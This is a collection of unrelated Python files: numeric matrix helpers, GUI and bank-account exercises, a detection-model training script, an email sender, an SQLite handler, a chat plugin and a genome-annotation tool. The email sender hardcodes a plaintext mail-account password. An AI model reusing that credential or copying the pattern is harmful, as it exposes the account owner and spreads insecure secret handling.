if len([0 for x in X if not sp.isspmatrix(x)]) == 0:
# scipy.sparse bug
# return sp.hstack(X, format = X[0].getformat() if format is None else
# format, dtype = X[0].dtyoe if dtype is None else dtype)
return sp.hstack(X)
else:
return np.hstack(X)
def max(X, s):
"""
Compute element-wise max(x,s) assignment for sparse or dense matrix.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
DD = Y.data.copy()
DD = np.maximum(DD, s)
return sp.csr_matrix((DD, Y.indices, Y.indptr), Y.shape)
else:
return np.maximum(X, s)
def min(X, s):
"""
Compute element-wise min(x,s) assignment for sparse or dense matrix.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
DD = Y.data.copy()
DD = np.minimum(DD, s)
return sp.csr_matrix((DD, Y.indices, Y.indptr), Y.shape)
else:
return np.minimum(X, s)
def count(X, s):
"""
Return the number of occurrences of element :param:`s` in sparse or
dense matrix X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
return sum([1 for x in X.data if s == x])
else:
return sum([1 for r in X.tolist() for x in r if s == x])
def nz_data(X):
"""
Return list of nonzero elements from X (! data, not indices).
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
return X.data.tolist()
else:
return [x for r in X.tolist() for x in r if x != 0]
def choose(n, k):
"""
A fast way to calculate binomial coefficients C(n, k). It is 10 times faster
than scipy.mis.comb for exact answers.
:param n: Index of binomial coefficient.
:type n: `int`
:param k: Index of binomial coefficient.
:type k: `int`
"""
if 0 <= k <= n:
ntok = 1
ktok = 1
for t in range(1, min(k, n - k) + 1):
ntok *= n
ktok *= t
n -= 1
return ntok // ktok
else:
return 0
| nilq/baby-python | python |
import wx
class SimpleSizer(wx.BoxSizer):
def __init__(self, first, second, gap=0, leftHeavy=False, rightHeavy=False, topHeavy=False, bottomHeavy=False):
self.first = first
self.second = second
horizontal = leftHeavy or rightHeavy
vertical = topHeavy or bottomHeavy
assert horizontal or vertical
assert not (horizontal and vertical)
firstHeavy = leftHeavy or topHeavy
secondHeavy = rightHeavy or bottomHeavy
wx.BoxSizer.__init__(self, wx.VERTICAL if vertical else wx.HORIZONTAL)
if first: self.Add(first, 1 if firstHeavy else 0, wx.EXPAND)
if gap: self.AddSpacer(gap)
if second: self.Add(second, 1 if secondHeavy else 0, wx.EXPAND)
@classmethod
def new(cls, code, *aa, **kk):
assert 3 == len(code)
# "heaviness" : Left, Right, Top, Bottom,
# Vertical (Top + Bottom), or
# Horizontal (Left + Right)
assert code[0] in "LRTBVH"
# "visibility": visible or hidden
assert code[1] in "VH" # 1st visible or hidden
assert code[2] in "VH" # 2nd visible or hidden
s = cls(*aa,
leftHeavy=(code[0] in "LH"),
rightHeavy=(code[0] in "RH"),
topHeavy=(code[0] in "TV"),
bottomHeavy=(code[0] in "BV"),
**kk)
if not "V" == code[1]: s.SetFirstVisible(False)
if not "V" == code[2]: s.SetSecondVisible(False)
return s
def Install(self, parent):
parent.SetSizer(self)
def GetFirst(self):
# return self.GetItem(0).GetWindow()
return self.first
def GetSecond(self):
# return self.GetItem(1).GetWindow()
return self.second
def IsFirstVisible(self):
return self.IsShown(0)
def IsSecondVisible(self):
return self.IsShown(1)
def SetFirstVisible(self, on=True, recursive=False, refresh=True):
if on: self.Show(0, recursive=recursive)
else: self.Hide(0, recursive=recursive)
if on: self.GetFirst().SetFocus()
if refresh: self.Layout()
def SetSecondVisible(self, on=True, recursive=False, refresh=True):
if on: self.Show(1, recursive=recursive)
else: self.Hide(1, recursive=recursive)
if on: self.GetSecond().SetFocus()
if refresh: self.Layout()
def ToggleFirstVisible(self, recursive=False, refresh=True):
self.SetFirstVisible(not self.IsFirstVisible(), recursive, refresh)
def ToggleSecondVisible(self, recursive=False, refresh=True):
self.SetSecondVisible(not self.IsSecondVisible(), recursive, refresh)
def ToggleVisible(self, recursive=False):
self.SetFirstVisible(not self.IsFirstVisible(), recursive, False)
self.SetSecondVisible(not self.IsSecondVisible(), recursive, False)
self.Layout()
| nilq/baby-python | python |
from bank_account import BankAccount
class User(object):
def __init__(self, username, email_address):
self.name = username # and we use the values passed in to set the name attribute
self.email = email_address # and the email attribute
self.accounts = {
'default': BankAccount(int_rate=0.02, balance=0)
}
# adding the deposit method
def make_deposit(self, amount, account='default'): # takes an argument that is the amount of the deposit
self.accounts[account].deposit(amount) # the specific user's account increases by the amount of the value received
return self
def make_withdrawal(self, amount, account='default'): # have this method decrease the user's balance by the amount specified
self.accounts[account].withdraw(amount)
return self
def display_user_balance(self, account='default'): # have this method print the user's name and account balance to the terminal
# eg. "User: Guido van Rossum, Balance: $150
print(f'User: {self.name}')
self.accounts[account].display_account_info()
#BONUS:
def transfer_money(self, other_user, amount): # have this method decrease the user's balance by the amount and add that amount to other other_user's balance
self.make_withdrawal(amount)
other_user.make_deposit(amount)
return self
# SENSEI BONUS
def add_account(self, name, account):
self.accounts[name] = account
return self
if __name__ == '__main__':
from faker import Faker
faker = Faker()
users = []
for _ in range(3):
profile = faker.simple_profile()
users.append(User(profile['username'], profile['mail']))
users[0].make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(400).display_user_balance()
users[1].make_deposit(400).make_deposit(300).make_withdrawal(200).make_withdrawal(100).display_user_balance()
users[2].make_deposit(400).make_withdrawal(100).make_withdrawal(100).make_withdrawal(100).display_user_balance()
users[0].transfer_money(users[1], 100).display_user_balance()
users[1].display_user_balance()
| nilq/baby-python | python |
from boids.code.boids import Boids
import pytest
from os.path import dirname, split, join
import yaml
import numpy as np
config = yaml.load(open(split(dirname(__file__))[0] + '/code/config.yaml'))
def test_bad_boids_regression():
'''
test compares a single position update of the refactored code
to the initial bad boids implementation.
'''
regression_data = yaml.load(open(join(dirname(__file__),'fixture.yaml')))
flock = Boids(size = 50)
flock.positions = np.asarray(regression_data["before"][0:2])
flock.velocities = np.asarray(regression_data["before"][2:])
flock.update(config['params'])
# check that positions match
assert np.all(abs(np.asarray(regression_data["after"][0:2]) - flock.positions) < 1e-1)
# check that velocities match
assert np.all(abs(np.asarray(regression_data["after"][2:]) - flock.velocities) < 1e-1)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""Top-level package for appliapps."""
__author__ = """Lars Malmstroem"""
__email__ = '[email protected]'
__version__ = '0.1.0'
| nilq/baby-python | python |
import socket
from datetime import datetime
import os.path as osp
import huepy as hue
import numpy as np
import torch
from torch.backends import cudnn
from torch.utils.tensorboard import SummaryWriter
import sys
sys.path.append('./')
from configs import args_faster_rcnn_hoim
from lib.datasets import get_data_loader
from lib.model.faster_rcnn_hoim import get_hoim_model
from lib.utils.misc import Nestedspace, resume_from_checkpoint, \
get_optimizer, get_lr_scheduler
from lib.utils.distributed import init_distributed_mode, is_main_process
from lib.utils.trainer import get_trainer
from lib.utils.serialization import mkdir_if_missing
def main(args):
if args.distributed:
init_distributed_mode(args)
device = torch.device(args.device)
cudnn.benchmark = False
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if is_main_process():
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
args.path = osp.join(
args.path, current_time + '_' + socket.gethostname())
mkdir_if_missing(args.path)
print(hue.info(hue.bold(hue.lightgreen(
'Working directory: {}'.format(args.path)))))
if args.train.use_tfboard:
tfboard = SummaryWriter(log_dir=args.path)
args.export_to_json(osp.join(args.path, 'args.json'))
else:
tfboard = None
train_loader = get_data_loader(args, train=True)
model = get_hoim_model(pretrained_backbone=True,
num_features=args.num_features, num_pids=args.num_pids,
num_cq_size=args.num_cq_size, num_bg_size=args.num_bg_size,
oim_momentum=args.train.oim_momentum, oim_scalar=args.oim_scalar,
min_size=args.train.min_size, max_size=args.train.max_size,
anchor_scales=(args.anchor_scales,), anchor_ratios=(
args.anchor_ratios,),
# RPN parameters
rpn_pre_nms_top_n_train=args.train.rpn_pre_nms_top_n,
rpn_post_nms_top_n_train=args.train.rpn_post_nms_top_n,
# rpn_pre_nms_top_n_test=args.test.rpn_pre_nms_top_n,
# rpn_post_nms_top_n_test=args.test.rpn_post_nms_top_n,
rpn_nms_thresh=args.train.rpn_nms_thresh,
rpn_fg_iou_thresh=args.train.rpn_positive_overlap,
rpn_bg_iou_thresh=args.train.rpn_negative_overlap,
rpn_batch_size_per_image=args.train.rpn_batch_size,
rpn_positive_fraction=args.train.rpn_fg_fraction,
# Box parameters
box_score_thresh=args.train.fg_thresh,
# box_nms_thresh=args.test.nms, # inference only
box_detections_per_img=args.train.rpn_post_nms_top_n, # use all
box_fg_iou_thresh=args.train.bg_thresh_hi,
box_bg_iou_thresh=args.train.bg_thresh_lo,
box_batch_size_per_image=args.train.rcnn_batch_size,
box_positive_fraction=args.train.fg_fraction, # for proposals
bbox_reg_weights=args.train.box_regression_weights,
)
model.to(device)
optimizer = get_optimizer(args, model)
lr_scheduler = get_lr_scheduler(args, optimizer)
if args.apex:
from apex import amp
model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
model_without_ddp = model
if args.distributed:
if args.apex:
from apex.parallel import DistributedDataParallel, convert_syncbn_model
model = convert_syncbn_model(model)
model = DistributedDataParallel(model)
else:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[args.local_rank], find_unused_parameters=True)
model_without_ddp = model.module
if args.resume is not None:
args, model_without_ddp, optimizer, lr_scheduler = resume_from_checkpoint(
args, model_without_ddp, optimizer, lr_scheduler)
trainer = get_trainer(args, model, model_without_ddp, train_loader,
optimizer, lr_scheduler, device, tfboard)
trainer.run(train_loader, max_epochs=args.train.epochs)
if is_main_process():
tfboard.close()
if __name__ == '__main__':
arg_parser = args_faster_rcnn_hoim()
args = arg_parser.parse_args(namespace=Nestedspace())
main(args)
| nilq/baby-python | python |
import smtplib
import os
import mimetypes
from email import encoders
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from fpdf import FPDF
import time
#Функция отправки сообщения
def send_email(addr_to, msg_subj, msg_text, files):
addr_from = "[email protected]" # Отправитель
password = "dishiestduke" # Пароль
msg = MIMEMultipart() # Создаем сообщение
msg['From'] = addr_from
msg['To'] = addr_to
msg['Subject'] = msg_subj
body = msg_text # Текст сообщения
msg.attach(MIMEText(body, 'plain')) # Добавляем в сообщение текст
process_attachement(msg, files)
server=smtplib.SMTP('smtp.mail.ru',25) # это не трогать!!! работает ток с mail.ru
server.starttls()
server.login(addr_from,password)
server.send_message(msg)
server.quit()
# Функция по обработке списка, добавляемых к сообщению файлов
def process_attachement(msg, files):
for f in files:
if os.path.isfile(f):
attach_file(msg,f)
elif os.path.exists(f):
dir = os.listdir(f)
for file in dir:
attach_file(msg,f+"/"+file)
# Функция по добавлению конкретного файла к сообщению
def attach_file(msg, filepath):
filename = os.path.basename(filepath)
ctype, encoding = mimetypes.guess_type(filepath)
if ctype is None or encoding is not None:
ctype = 'application/octet-stream'
maintype, subtype = ctype.split('/', 1)
with open(filepath, 'rb') as fp:
file = MIMEBase(maintype, subtype)
file.set_payload(fp.read())
fp.close()
encoders.encode_base64(file)
file.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(file)
def pdf_write(image):
pdf = FPDF()
pdf.add_page()
pdf.set_font("Arial", size=12)
center="Violation report"
pdf.cell(200, 10, txt=center, ln=1, align="C")
pdf.image(image, x=10, y=20, w=100)
pdf.ln(85) # ниже на 85
name = 'Lack of a helmet or building vest'
pdf.cell(200, 10, txt=name, ln=1)
vremy=str(time.asctime())
pdf.cell(200,10,txt=vremy,ln=1)
surname='Responsible: Sidorov P.A.'
pdf.cell(200,10,txt=surname,ln=1)
city='Nizhny Novgorod,Minin Street'
pdf.cell(200,10,txt=city,ln=1)
pdf.set_line_width(1)
pdf.set_draw_color(0, 0, 0)
pdf.line(20, 115, 100, 115)
pdf.output("Output/pdf/Accountability.pdf")
| nilq/baby-python | python |
import os
from typing import Union
import sqlite3
from sqlite3 import Error
from coordinates import Coordinates
class SqlHandler:
def __init__(self):
self._database = "data.db"
self._connection = None
self._cursor = None
self.connected = False
def _create_new_database(self) -> None:
try:
self._connect_to_sqlite3_database()
self._create_cities_table()
self._create_distances_table()
self._connection.commit()
self._connection.close()
except Error as error:
raise error
def _create_cities_table(self) -> None:
sql_table_cities_create = """
CREATE TABLE cities (
id integer PRIMARY KEY,
city text NOT NULL,
longitude REAL,
latitude REAL
)
"""
self._cursor.execute(sql_table_cities_create)
def _create_distances_table(self) -> None:
sql_table_distances_create = """
CREATE TABLE distances (
city_1_id integer,
city_2_id integer,
distance REAL,
duration REAL
)
"""
self._cursor.execute(sql_table_distances_create)
def _get_city_id(self, city: str) -> int:
sql_string = "SELECT id FROM cities WHERE city = ?"
self._cursor.execute(sql_string, (city,))
answer = self._cursor.fetchone()
if answer is None:
raise ValueError('City not known.')
return answer[0]
def _connect_to_sqlite3_database(self) -> None:
try:
self._connection = sqlite3.connect(self._database)
self._cursor = self._connection.cursor()
self.connected = True
except Error as error:
raise error
def connect(self) -> None:
if self.connected:
return
if not os.path.isfile(self._database):
self._create_new_database()
self._connect_to_sqlite3_database()
def close(self) -> None:
if self.connected:
self._connection.close()
self.connected = False
def _connect_if_not_connected(self):
if not self.connected:
self.connect()
def get_coordinates_from_city(self, city: str) -> Coordinates:
self._connect_if_not_connected()
sql_string = "SELECT longitude, latitude FROM cities WHERE city = ?"
self._cursor.execute(sql_string, (city,))
answer = self._cursor.fetchone()
coordinates = Coordinates()
if answer:
coordinates.longitude = answer[0]
coordinates.latitude = answer[1]
return coordinates
def set_coordinates_from_city(self, city: str, longitude: int, latitude: int) -> None:
self._connect_if_not_connected()
sql_string = "INSERT INTO cities (city, longitude, latitude) VALUES (?, ?, ?)"
self._cursor.execute(sql_string, (city, longitude, latitude,))
self._connection.commit()
def set_distance_duration(self, city_1: str, city_2: str, distance: float, duration: float) -> None:
self._connect_if_not_connected()
city_1_id = self._get_city_id(city_1)
city_2_id = self._get_city_id(city_2)
sql_string = "INSERT INTO distances (city_1_id, city_2_id, distance, duration) " \
"VALUES (?, ?, ?, ?)"
self._cursor.execute(sql_string, (city_1_id, city_2_id, distance, duration,))
self._connection.commit()
def get_value(self, city_1: str, city_2: str, option: str) -> Union[float, None]:
self._connect_if_not_connected()
if option not in ['distance', 'duration']:
raise ValueError('Only "distance" and "duration" allowed.')
city_1_id = self._get_city_id(city_1)
city_2_id = self._get_city_id(city_2)
sql_string = f"SELECT {option} FROM distances WHERE " \
"(city_1_id = ? AND city_2_id = ?)" \
" OR (city_1_id = ? AND city_2_id = ?)"
self._cursor.execute(sql_string, (city_1_id, city_2_id, city_2_id, city_1_id,))
answer = self._cursor.fetchone()
if answer is None:
return None
return answer[0]
| nilq/baby-python | python |
# -*- coding: utf8 -*-
__description__ = "Pick a random item from a given list of items. The trigger is 'pick'."
__version__ = "1.0"
__author__ = "Dingo"
from core.plugin import Plugin
import re
import random
async def pick(command):
message = " ".join(command.args)
message = message.replace(" and say:", ":")
try:
pickstring, saystring = re.split(r": ", message, 1)
except ValueError:
pickstring = message
saystring = None
prepicks = [x.strip() for x in pickstring.split(",")]
picks = []
re_range = re.compile(r"^(-?\d+)\.\.(-?\d+)(;\d+)?$")
for pick in prepicks:
rangecheck = re_range.search(pick)
if rangecheck:
try:
if rangecheck.group(1).startswith("0") or rangecheck.group(1).startswith("-0"):
fill_string = "%%0%ii" % len(rangecheck.group(1))
else:
fill_string = "%i"
start = int(rangecheck.group(1))
stop = int(rangecheck.group(2))
if rangecheck.group(3):
step = int(rangecheck.group(3)[1:])
else:
step = 1
except ValueError:
picks.append(pick)
continue
if start > stop or abs((stop - start) / step) > 1024:
picks.append(pick)
else:
picks.extend(fill_string % i for i in range(start, stop + 1, step))
else:
picks.append(pick)
absurdity = random.randint(1, 100)
if absurdity > 80:
texts = (
"The sources from beyond the grave say: %s",
"Our computer simulation predicts %s! No warranty expressed or implied.",
"Don't you worry about %s, let me worry about blank.",
"%s? %S?? You're not looking at the big picture!",
"Give me %s or give me death!",
"Amy! I mean: %s!",
"Once again, the conservative, sandwich-heavy %s pays off for the hungry investor.",
"%s: style and comfort for the discriminating crotch.",
"%s sounds interesting! No, that other word. Tedious!",
"Good man. Nixon's pro-war and pro-%s.",
"Doug & Carrie, Doug & Carrie, Doug & Carrie, Doug & Carrie! %s! %s! %s! %s!",
# "%u, %s is make-believe, like elves, gremlins, and eskimos.",
"Weaseling out of %s is important to learn. It's what separates us from the animals ... except the weasel.",
"Is %s too violent for children? Most people would say, 'No, of course not. Don't be ridiculous.' But one woman says, 'Yes.' %u.",
"The dark side clouds everything. Impossible to see the future is... But I'm sure %s is in it!",
"I spent 90% of my money on women and %s. The rest I wasted.",
"As God once put it: let there be %s!",
# "%u, today is your day, %s is waiting, so get on your way.",
"I've got four words for you: I! LOVE! THIS! %S! YEEEEEEEEEEEAAAS!!!",
"Remember, a Jedi's strength flows from the Force. But beware. Anger, fear, %s. The dark side they are.",
"Choose %s! Respect my authoritah!!",
"%s: it's a privilege, not a right.",
"Fear leads to Anger. Anger leads to Hate. Hate leads to %s.",
"Drugs are for losers, and %s is for losers with big weird eyebrows.",
# "I heard %s makes you stupid. | <%u> No, I'm... doesn't!",
"%s. Hell, it's about time!",
)
else:
texts = (
"The computer simulation recommends %s.",
"Result: %s",
"The answer is %s.",
"Optimal choice: %s",
)
if saystring:
if any(mark in saystring for mark in ("%s", "%S", "%n", "%N")):
text = saystring
else:
text = "%s " + saystring
else:
if len(picks) == 1 and picks[0].lower() in (
"flower",
"nose",
"fight",
"a fight",
"pocket",
"lock",
):
onlypick = picks[0].lower()
if onlypick == "flower":
text = "%u picks a flower. As its sweet smell fills the channel, all chatter get +3 for saving throws on net splits."
elif onlypick == "nose":
text = "Eeeew! %u, do that somewhere private!"
elif onlypick in ("fight", "a fight"):
text = "%u starts a brawl in another channel. Only the quick reaction of fellow %c chatters saves the weakling from a gruesome fate."
elif onlypick == "pocket":
text = "Despite being amazingly clumsy, %u manages to pick the pocket of an innocent bystander. A used handkerchief is the reward."
elif onlypick == "lock":
text = "Lockpick required."
else:
text = random.choice(texts)
chosen = random.choice(picks)
if picks != [""]:
msg = text
# msg = msg.replace("%u", event.user)
# msg = msg.replace("%c", str(event.channel))
msg = msg.replace("%S", "**" + chosen.upper() + "**")
msg = msg.replace("%s", "**" + chosen + "**")
msg = msg.replace("%N", chosen.upper())
msg = msg.replace("%n", chosen)
else:
return None
await plugin.respond_message(command, msg, delay=200)
plugin = Plugin("pick", "General", "Plugin to provide a simple, randomized !pick")
plugin.add_command("pick", pick, "aids you in those really important life decisions")
| nilq/baby-python | python |
#! /usr/bin/env python
# -*- coding:UTF-8 -*-
"""
------------------------------------------------------------------------------------------
It is used to get the longest mRNA of gene and filter pep and cds result with a certain length;
usage: python xx.py -i GFF -f FASTA -g out.gff -o out.fa -s species_short_name -l 30
newly revised by Frank in Feb 22th 2020.
newly revised by Frank in Aug 15th 2020,
a. solve phase coding problem;
b. solve translate table problem.
c. solve columns error of gff.
------------------------------------------------------------------------------------------
"""
__author__ = "Frank"
__version__ = "0.4.3"
import sys
import os
import gzip
import re
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.Alphabet import IUPAC
from Bio.Alphabet import generic_dna
from collections import OrderedDict
from optparse import OptionParser
def readfile(filein,mode):
try:
if filein.endswith('gz'):
fx = gzip.open(filein,mode+'b')
else:
fx = file(filein,mode)
except:
sys.stderr.write('ERROR: fail to the IO file: %s!\n'%filein)
return fx
def calculateDist(listx):
dists = []
for i in xrange(len(listx)):
pos1 = int(listx[i].split('_')[0])
pos2 = int(listx[i].split('_')[1])
dist = pos2-pos1+1
dists.append(dist)
sumx = float(np.sum(dists))
return sumx
def gffAttr(idx,key_len=3,sep=';'):
if sep in idx:
out = idx.split(sep)[0][key_len:]
else:
out = idx[key_len:]
return out
def reParentAttr(line):
if 'Parent=' in line:
parent = re.search(r'Parent=\S+;?',line).group()
par_info = gffAttr(parent,key_len=7)
else:
par_info = reIDAttr(line)
return par_info
def reIDAttr(line):
idx = re.search(r'ID=\S+;?',line).group()
id_info = gffAttr(idx)
return id_info
def reIDAttr2(line):
idx = re.search(r'ID=\S+;?',line)
if idx == None:
print line
id_info = None
else:
idx = idx.group()
id_info = gffAttr(idx)
return id_info
def reNameAttr(line):
name = re.search(r'Name=\S+;?',line).group()
name_info = gffAttr(name,key_len=5)
return name_info
def outgffAttr(info,line,split_sym=';'):
linetype = info.split('/')[1]
if linetype == 'gene':
geneid = reIDAttr(line)
geneid2 = outgene(geneid)
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+geneid2+';\n'
#elif linetype == 'mRNA' or linetype == 'CDS':
else:
mRNAparid = reParentAttr(line)
mRNAparid2 = outgene(mRNAparid)
if 'ID=' in line:
mRNAid = reIDAttr(line)
mRNAid2 = outgene(mRNAid)
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+mRNAid2+';Parent='+mRNAparid2+';\n'
else:
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+mRNAparid2+';Parent='+mRNAparid2+';\n'
return line
def sortedDict(hgff):
for gene in hgff:
if len(hgff[gene]) == 0:
del hgff[gene]
continue
distcal = {}
for x in hgff[gene]:
distx = calculateDist(hgff[gene][x])
distcal[x] = distx
sorted_dist = sorted(distcal.items(), key = lambda d:d[1],reverse=True)
sorted_key = sorted_dist[0][0]
strand = gene.split('/')[-1]
if strand == '+':
sorted_value = sorted(hgff[gene][sorted_key],key=lambda x:int(x.split('_')[0]))
else:
sorted_value = sorted(hgff[gene][sorted_key],key=lambda x:int(x.split('_')[0]),reverse=True)
hgff[gene] = {sorted_key:sorted_value}
return hgff
def outgff(hgff,hgeneinfo,hinfo,split_sym='_'):
houtinfo = OrderedDict()
for gene in hgff:
if gene in hgeneinfo:
chrx = hgeneinfo[gene].split('/')[0]
geneinfox = chrx+'/'+'gene'+'/'+gene
houtinfo[geneinfox] = hinfo[geneinfox]
for x in hgff[gene]:
rnainfox = chrx+'/'+'mRNA'+'/'+x
houtinfo[rnainfox] = hinfo[rnainfox]
for i in xrange(len(hgff[gene][x])):
cdsinfox = chrx+'/CDS/'+split_sym.join(hgff[gene][x][i].split(split_sym)[0:-1])+'/'+x
houtinfo[cdsinfox] = hinfo[cdsinfox]
else:
continue
return houtinfo
def outseq_trans_strand(seq,strand_dir):
if strand_dir == '-':
seqout = ''.join(list(Seq(seq, IUPAC.unambiguous_dna).reverse_complement())).upper()
else:
seqout = seq.upper()
return seqout
def outgene(gene): # update 2020.01.08
#if ':' in gene:
# geneout = gene.split(':')[-1]
#else:
# geneout = gene
gene = gene.split(':')[-1]
geneout = re.sub('[^.\w+]','_',gene)
return geneout
def longestmRNA(fgff,gene_region='CDS'):
hgff = OrderedDict()
hmRNA_gene = {}
hgeneinfo = {} #{geneid1:'chr1/+',geneid2:'chr1/-'}
hinfo = {} #{'chr1/gene/geneid':line,'chr1/mRNA/rna_id':line'}
for line in fgff:
if line.startswith('#'):continue
if len(line.strip()) == 0:continue
gffline = line.strip().split('\t')
geneinfo = gffline[0]+'/'+gffline[6]
if gffline[2] == 'gene': #确保gene行都有biotype字符串或都没有才行
if 'biotype=protein_coding' in gffline[8]:
geneid = reIDAttr(gffline[8])+'/'+gffline[6]
hgff.setdefault(geneid,{})
hgeneinfo[geneid] = geneinfo
geneinfox = gffline[0]+'/'+'gene'+'/'+geneid
hinfo[geneinfox] = line
elif 'biotype=' not in gffline[8]:
geneid = reIDAttr(gffline[8])+'/'+gffline[6]
hgff.setdefault(geneid,{})
hgeneinfo[geneid] = geneinfo
geneinfox = gffline[0]+'/'+'gene'+'/'+geneid
hinfo[geneinfox] = line
else:
continue
else:
if gffline[2] == 'mRNA' or gffline[2] == 'transcript':
rna_parent = reParentAttr(gffline[8])+'/'+gffline[6]
rna_id = reIDAttr(gffline[8])
hmRNA_gene[rna_id] = rna_parent
if rna_parent in hgff:
hgff[rna_parent][rna_id] = []
else:
continue
rnainfox = gffline[0]+'/'+'mRNA'+'/'+rna_id
hinfo[rnainfox] = line
elif gffline[2] == gene_region:
cds_parent = reParentAttr(gffline[8])
posinfo = gffline[3]+'_'+gffline[4]+'_'+gffline[7]
if cds_parent in hmRNA_gene:
genex = hmRNA_gene[cds_parent]
if genex in hgff:
hgff[genex][cds_parent].append(posinfo)
else:
continue
else:
continue
cdsinfox = gffline[0]+'/CDS/'+gffline[3]+'_'+gffline[4]+'/'+cds_parent
hinfo[cdsinfox] = line
else:
continue
hgff = sortedDict(hgff)
houtinfo = outgff(hgff,hgeneinfo,hinfo,split_sym='_')
del hinfo
return hgff,hgeneinfo,houtinfo
#def outfa_parse(hout,hgeneinfo,fasta,fa_out,sp_abbr="None",outseqname_type="gene"):
def outfa_parse(hout,hgeneinfo,fasta,fa_out,fp_out,sp_abbr="None",outseqname_type="gene",table=1,cds_fetch_position='True'):
for seq in SeqIO.parse(fasta,"fasta"):
for gene in hout:
if len(hout[gene]) == 0:continue
if gene in hgeneinfo:
chrom = hgeneinfo[gene].split('/')[0]
sym = hgeneinfo[gene].split('/')[-1]
seqouts = []
if chrom == seq.id:
for x in hout[gene]:
phase_list = []
for i in xrange(len(hout[gene][x])):
pos1 = int(hout[gene][x][i].split('_')[0])
pos2 = int(hout[gene][x][i].split('_')[1])
seqout = str(seq.seq)[pos1-1:pos2]
seqouts.append(seqout)
phase_list.append(hout[gene][x][i].split('_')[-1])
del hout[gene]
#del hgeneinfo[gene]
if sym == '+':
outseqs = ''.join(seqouts)
else:
outseqs = ''.join(seqouts[::-1])
seq_ret = outseq_trans_strand(outseqs,sym)
phase = phase_list[0]
if phase == '.':
seq_retx = seq_ret
else:
seq_retx = seq_ret[int(phase):]
gene = outgene(gene.split('/')[0])
x = outgene(x)
if outseqname_type == "gene":
if sp_abbr == "None":
if cds_fetch_position == 'True':
fa_out.write('>'+gene+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+gene+'\n'+seq_retx+'\n')
fp_out.write('>'+gene+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
if cds_fetch_position == 'True':
fa_out.write('>'+gene+'_'+sp_abbr+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+gene+'_'+sp_abbr+'\n'+seq_retx+'\n')
fp_out.write('>'+gene+'_'+sp_abbr+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
elif outseqname_type == "mRNA":
if sp_abbr == "None":
if cds_fetch_position == 'True':
fa_out.write('>'+x+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+x+'\n'+seq_retx+'\n')
fp_out.write('>'+x+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
if cds_fetch_position == 'True':
fa_out.write('>'+x+'_'+sp_abbr+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+x+'_'+sp_abbr+'\n'+seq_retx+'\n')
fp_out.write('>'+x+'_'+sp_abbr+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
sys.stderr.write('[ERROR] Something wrong with the -t option, please check it.')
else:
continue
else:
continue
def main():
usage="%prog [options]" + '\n' + __doc__ + "\n"
parser = OptionParser(usage,version="%prog " + __version__)
parser.add_option('-i',"--input-gff",action="store",type="string",dest="input_gff",help="Annotation file in gff format. [required]")
parser.add_option('-f',"--input-fasta",action="store",type="string",dest="input_fasta",help="genome file in fasta format. [required]")
parser.add_option('-g',"--out-gff",action="store",type="string",dest="output_gff",help="output files(s) in gff format with longest mRNA. [required]")
parser.add_option('-o',"--out-fa-prefix",action="store",type="string",dest="output_fasta",help="prefix of output files(s) in fasta format. [required]")
parser.add_option('-s',"--species-shortname",action="store",type="string",dest="species_shortname",help="add species shortname in sequence name",default="None")
parser.add_option('-r',"--region",action="store",dest="gene_region",help="the region of genes, you can choose 'CDS' or 'exon'",type="choice",choices=["CDS","exon"],default="CDS")
parser.add_option('-t',"--type",action="store",dest="outseqname_type",help="type of out sequence name,you can choose 'gene' or 'mRNA'",type="choice",choices=["gene","mRNA"],default="mRNA")
parser.add_option('-l',"--length",action="store",dest="pep_length",help="the filtered length of protein sequence",type="int",default=30)
parser.add_option('--tt',action='store',dest="transl_table",help="codon table used for translating CDS sequence, you can learn more from the link: http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi",type="int",default=1)
parser.add_option('--cfp',action='store',dest='cds_fetch_position',help='CDS sequences extracted by position or not, True or False, default="False"',type='choice',choices=["True","False"],default="False")
(options,args)=parser.parse_args()
if not (options.input_fasta and options.input_gff):
parser.print_help()
sys.exit(0)
with readfile(options.input_gff,'r') as fgff:
hout,hgeneinfo,houtinfo = longestmRNA(fgff,gene_region=options.gene_region)
with readfile(options.output_gff,'w') as fgff_out:
for outinfo in houtinfo:
fgff_out.write(outgffAttr(outinfo,houtinfo[outinfo]))
with readfile(options.input_fasta,'r') as fasta, readfile(options.output_fasta+'.cds','w') as fa_out, readfile(options.output_fasta+'.pep','w') as fp_out:
outfa_parse(hout,hgeneinfo,fasta,fa_out,fp_out,sp_abbr=options.species_shortname,outseqname_type=options.outseqname_type,table=options.transl_table,cds_fetch_position=options.cds_fetch_position)
